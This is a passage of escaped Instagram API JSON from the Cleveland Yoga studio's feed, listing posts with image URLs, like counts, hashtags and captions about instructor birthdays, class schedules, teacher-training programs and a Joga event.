agram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/c5ee7d49a1aa145649b9ebc2ac562cf0/5D73A02C/t51.2885-15/sh0.08/e35/s640x640/56666989_397506707768977_2394148117322657131_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1555948909&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17856503725380926&quot;,&quot;text&quot;:&quot;Happy Birthday @christinalamarca! \nWishing you a day full of smiles as big as this one \ud83d\udc46\n\nCelebrate with Christina this week on the mat in Beachwood:\n\nTuesday 4:45pm Power Vinyasa Yoga 60\n\nWednesday 12:15pm Power Vinyasa Yoga 60\nWednesday 7:30pm YINyasa 75\n\nFriday 6:30am Power Vinyasa Yoga 60\nFriday 10:45am Power Yoga Basics\n\nSaturday 11:15am Power Yoga Basics\n\nSunday 8:45am Power Yoga Basics&quot;,&quot;created_time&quot;:&quot;1555948909&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:93},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:4},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwkFQ6QlFqe/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2025535494633781703_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/742b4cc593d73b2d46c2626cadbd40d2/5D740BC8/t51.2885-15/e15/c73.0.933.933a/s150x150/56902590_610398629461868_1026078511457877086_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:276,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/500e98777e0e58686ab3aa9fc60df8d0/5D9F599F/t51.2885-15/e15/s320x320/56902590_610398629461868_1026078511457877086_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:552,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/93a5c23c2128f30efea247da4cf72744/5D60B069/t51.2885-15/sh0.08/e35/s640x640/56902590_610398629461868_1026078511457877086_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1555682668&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17856520030379361&quot;,&quot;text&quot;:&quot;Cleveland, are you ready for this!? Tami Schneider and Ylonda Rosenthal-Greene are teaming up for an epic 200-hour Yoga Teacher Training Immersion!\n\nJoin these two powerhouse women for a life-changing training. Both @tamischneider27 and @awaketomysoul will bring their unique experience and expertise to this blended program. Become an empowered leader through the practice of yoga and walk away from this training prepared to lead!\n\nTraining begins this June. Dates are June 14-20 (6 consecutive days: Friday-Thursday) and again on July 19-25 (Friday-Thursday). More details coming soon, stay tuned on this page to be the first to know about registration.&quot;,&quot;created_time&quot;:&quot;1555682668&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:202},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:16},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwcJcz1l3nH/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46696,&quot;longitude&quot;:-81.4968899,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:352832241813574},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[{&quot;user&quot;:{&quot;username&quot;:&quot;tamischneider27&quot;},&quot;position&quot;:{&quot;x&quot;:0.272,&quot;y&quot;:0.8509324445}},{&quot;user&quot;:{&quot;username&quot;:&quot;awaketomysoul&quot;},&quot;position&quot;:{&quot;x&quot;:0.7542222222,&quot;y&quot;:0.9692604502000001}}]},{&quot;id&quot;:&quot;2024093438055562418_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/735c037af6f8a0902c92409be81a23ca/5D73C032/t51.2885-15/e15/s150x150/57204165_821329718248275_1117164958426960666_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/06f56551bbfe1167d3fbec4c7b9f7098/5D697CC2/t51.2885-15/e15/s320x320/57204165_821329718248275_1117164958426960666_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/f2f45081bab0a5a1946c8cd09303027c/5D72FF34/t51.2885-15/sh0.08/e35/s640x640/57204165_821329718248275_1117164958426960666_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1555510762&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17848570540409789&quot;,&quot;text&quot;:&quot;Happy Birthday Melissa! \nWe wish @my_chemistry a day full of your favorite things! \nCelebrate with her on the mat in Little Italy:\n\nTuesday 7:45pm Power Vinyasa Yoga 60\n\nSunday 10:30am Power Vinyasa Yoga 75&quot;,&quot;created_time&quot;:&quot;1555510762&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:69},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:13},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwXBkH_gDyy/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2023653456147316026_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/9f2ba279ba301f6e9a103acafaad6d2b/5D5E7B92/t51.2885-15/e35/c0.129.1080.1080/s150x150/57085388_132828367832941_5455883683168591055_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:396,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/93086071132ba2f91f8b4c7aa075cbee/5D6349D8/t51.2885-15/e35/p320x320/57085388_132828367832941_5455883683168591055_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:793,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/7ae0463cd6ae253d274671d7f93c25cd/5D628C8F/t51.2885-15/sh0.08/e35/p640x640/57085388_132828367832941_5455883683168591055_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1555458312&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17880212422333705&quot;,&quot;text&quot;:&quot;Standing Together Sets Us Apart!\n\nEveryone needs a supportive team on their side to lead a successful life. Maybe it\u2019s the person who watches your children so you can go to yoga, or the friend who always answers when you call. Maybe it\u2019s the person who accepts you as you are, fully. Tag a friend/family/your personal \u201cteam\u201d member who supports you \ud83d\udc47\ud83d\udc47\ud83d\udc47 #Repost @tamischneider27\n\u30fb\u30fb\u30fb\nTeamwork makes the dreamwork. \ud83d\udcab\u2b50\ufe0f\u2728 Every Tuesday we have a team meeting. There are so many things that go on behind the scenes in running yoga studios. And this team right here kills it every day! They are the ones communicating with our guests via email, updating our website, making sure our brand is solid, organizing our class schedules, making sure everything works in the studios, connecting with teachers, budgeting expenses and managing operations and of course, teaching rock solid, high performing yoga classes. This team knows that in order to achieve our goals it\u2019s important that we all work together in unison. Right here is a group of supportive team members who all offer something special and unique to our programs! I am grateful. \ud83d\ude4f\ud83c\udffc @rebeccamarich @jackiemains @rtrem17 -\n(not pictured) @amyschneideryoga @clevelandyoga_lissafarkas @debidarnell -\n-\n#teamwork #yogastudios #support #sweat #yogateacher #yogaeverydamnday #yogaforathletes #yogaforthepros #contribution #workingtogether #standingtogethersetsusapart #deepcommunity #clevelandyoga #cleyoga #joblove #imaclevelander #yogateachertraining #together #dothework #baptisteyoga \u2764\ufe0f&quot;,&quot;created_time&quot;:&quot;1555458312&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:103},&quot;tags&quot;:[&quot;yogaeverydamnday&quot;,&quot;support&quot;,&quot;yogateachertraining&quot;,&quot;workingtogether&quot;,&quot;cleyoga&quot;,&quot;together&quot;,&quot;yogastudios&quot;,&quot;clevelandyoga&quot;,&quot;yogateacher&quot;,&quot;joblove&quot;,&quot;yogaforthepros&quot;,&quot;sweat&quot;,&quot;deepcommunity&quot;,&quot;baptisteyoga&quot;,&quot;imaclevelander&quot;,&quot;teamwork&quot;,&quot;yogaforathletes&quot;,&quot;standingtogethersetsusapart&quot;,&quot;repost&quot;,&quot;dothework&quot;,&quot;contribution&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:7},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwVdhi6Jv06/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2019823850837235266_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/199565bb49a8e6a2b329ec19bfca12ee/5D6C662C/t51.2885-15/e15/s150x150/56178992_374062373320319_419921613431568595_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/8b2ff2228a7628e0ec16fb14a89de20f/5D7B5D21/t51.2885-15/e15/s320x320/56178992_374062373320319_419921613431568595_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/730cff979b57cc6463638a7702998ec0/5D55F3B3/t51.2885-15/sh0.08/e35/s640x640/56178992_374062373320319_419921613431568595_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1555001787&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18025988149187830&quot;,&quot;text&quot;:&quot;\u201cThis program has been in my head for years and I have finally put it on the schedule! I developed this program to share the trials and tribulations of my own teaching path, both in Cleveland and on the road for Baptiste Yoga. As a result, I\u2019m excited to offer you the tools and findings that really work.\u201d \u2013 Tami Schneider\n\nKick off to the 300-hour YTT begins tomorrow with the Level-Up Advanced Teacher Training Immersion Weekend. \nStill thinking about joining the full 300 hour YTT? The Advanced Teacher Training Immersion weekend serves as weekend one of the full program. Or, you can take the Immersion as a standalone training and earn 25 contact hours towards Yoga Alliance Continuing Education Requirements. Either way, you want to be there this weekend. Grab your spot now, why wait?\n\nLink in bio!&quot;,&quot;created_time&quot;:&quot;1555001787&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:42},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwH2xdCA9ZC/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46638,&quot;longitude&quot;:-81.90082,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:156593238299284},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2019712388603211415_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/fb9550a4ec65b2fbb9519f7bd6c746f0/5D7952C1/t51.2885-15/e35/c0.135.1080.1080a/s150x150/55831798_337706206884513_7958832630789738088_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:400,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/057fe7114ab404d369e33c11ee71c0cb/5D7879A7/t51.2885-15/e35/p320x320/55831798_337706206884513_7958832630789738088_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:800,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/8a58582b7222d89b4b2377ef1ff3e716/5D642CF0/t51.2885-15/sh0.08/e35/p640x640/55831798_337706206884513_7958832630789738088_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554988500&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18053809402018953&quot;,&quot;text&quot;:&quot;Thursday Mood \u261d\ufe0f\u261d\ufe0f\u261d\ufe0f Catch Tami in Westlake today at 10:45am!\n\n#Repost @tamischneider27\n\u30fb\u30fb\u30fb\nOkay Thursday, here we go! Today I Am Fearless. This poster used to hang in the windows at our former Uptown location for 5 years. Every time I would walk in those doors, I would come face-to-face with myself and remember\u2026 Oh right, I am fearless! Sometimes I forget that. We wouldn\u2019t be in the places and situations we\u2019ve created without having made some bold moves along the way. There are plenty of things that I\u2019ve done that haven\u2019t gone the way I envisioned\u2014and, the lessons learned along the way were tough, yet valuable. I use the lessons of what didn\u2019t work as a platform to stand on to reach a better level. My mantra today is: keep calm, carry on and stay fearless. Sounds like i just created a theme for my class today! -\n-\n#calm #focused #fearless #keepcalmcarryon #meditation #yoga #yogaforathletes #breathe #tbt #yogaeveryday #yogateachertraining #yogateacher #baptisteyoga #clevelandyoga&quot;,&quot;created_time&quot;:&quot;1554988500&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:68},&quot;tags&quot;:[&quot;focused&quot;,&quot;breathe&quot;,&quot;yogaeveryday&quot;,&quot;keepcalmcarryon&quot;,&quot;yogateachertraining&quot;,&quot;yogaforathletes&quot;,&quot;baptisteyoga&quot;,&quot;yoga&quot;,&quot;repost&quot;,&quot;calm&quot;,&quot;meditation&quot;,&quot;tbt&quot;,&quot;yogateacher&quot;,&quot;clevelandyoga&quot;,&quot;fearless&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:3},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwHdbdvJm6X/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2019054575897545861_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/65ca42c4201c3621d1575e005b626948/5D6C7641/t51.2885-15/e15/s150x150/55957878_2156133194462509_3250435509983080631_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/fe4d60ff8d0b0715d6aaf67caa020d0d/5D9FA339/t51.2885-15/e15/s320x320/55957878_2156133194462509_3250435509983080631_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/916243d2d7111799fd4a1811ee3128c7/5D9D5D7C/t51.2885-15/sh0.08/e35/s640x640/55957878_2156133194462509_3250435509983080631_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554910083&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17843990152413584&quot;,&quot;text&quot;:&quot;Raise your hand if you&#039;re in the mood for a Scott class \ud83d\ude4b\n\nCatch @scottsupler tonight at 4:45pm for 75 minutes of Power Vinyasa Flow \ud83d\udd25\n\nBEACHWOOD studio&quot;,&quot;created_time&quot;:&quot;1554910083&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:96},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:3},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwFH3B6gAyF/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46696,&quot;longitude&quot;:-81.4968899,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:352832241813574},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2018265467512272355_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d25120d0ac9a705e6b38b357078a168e/5CDFF856/t51.2885-15/e35/s150x150/54511618_272487040356894_4625497915715681814_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/eea77fd9f952f00b45ebba1bb3d592c1/5CDFACA6/t51.2885-15/e35/s320x320/54511618_272487040356894_4625497915715681814_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/2a2472113982965c62fac31cc6b031e0/5CDFB154/t51.2885-15/e35/54511618_272487040356894_4625497915715681814_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554816051&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17882637754326284&quot;,&quot;text&quot;:&quot;Join Jen on the mat this week! She is full of grace and creativity \ud83e\udd70 \n#Repost @jenseaman\n\u30fb\u30fb\u30fb\nTeaching two extra classes this week. @clevelandyoga #cylittleitaly Saturday 4:30p &amp; #cywestlake Wednesday 6a. Also teaching regular schedule. See the schedule at Cleveland Yoga\u2019s website for details. See you on the mat. xo&quot;,&quot;created_time&quot;:&quot;1554816051&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:60},&quot;tags&quot;:[&quot;cywestlake&quot;,&quot;repost&quot;,&quot;cylittleitaly&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:2},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwCUb_dgbXj/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/ad53db280c631696b1399b86b901a0e4/5CE005DE/t50.2886-16/56750443_335737273749298_6390941276665020416_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18036960133101698&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/46353d569bf9319bff453310c2795541/5CDFFEA3/t50.2886-16/57387163_1401107793365535_8886783941017600000_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;17848848100398307&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/46353d569bf9319bff453310c2795541/5CDFFEA3/t50.2886-16/57387163_1401107793365535_8886783941017600000_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;17848848100398307&quot;}}},{&quot;id&quot;:&quot;2017911391331870533_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d65a1089ad1b6170276ad06f7eba0ab1/5CDFB10B/t51.2885-15/e15/s150x150/54731759_2146894285602426_4650877775909074521_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/b1e05976cbf66f0cc0bf466be4a73853/5CE00C33/t51.2885-15/e15/s320x320/54731759_2146894285602426_4650877775909074521_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/7f503cd9cb26a1a333666f342458fe68/5CDFF3C8/t51.2885-15/e15/s640x640/54731759_2146894285602426_4650877775909074521_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554773818&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17972152429245783&quot;,&quot;text&quot;:&quot;Work. Sweat. Recover. \nJoin Anthony Trem and Tami Schneider as they team teach a special Joga-themed practice this Saturday, April 13 at 9:30 am. JOGA is a movement system made up of the benefits of yoga combined with the biomechanics of sport. JOGA enhances athletic performance, improves concentration, and decreases recovery time. Anthony Trem, CY Concord teacher, and Cleveland Browns Physical Therapist will speak to how each pose affects and improves your practice. Tami will close out the event with a 30-minute recovery session!\n\nSaturday, April 13th\n9:30am\nBEACHWOOD\n\nSign up to reserve your spot! Link in bio&quot;,&quot;created_time&quot;:&quot;1554773818&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland 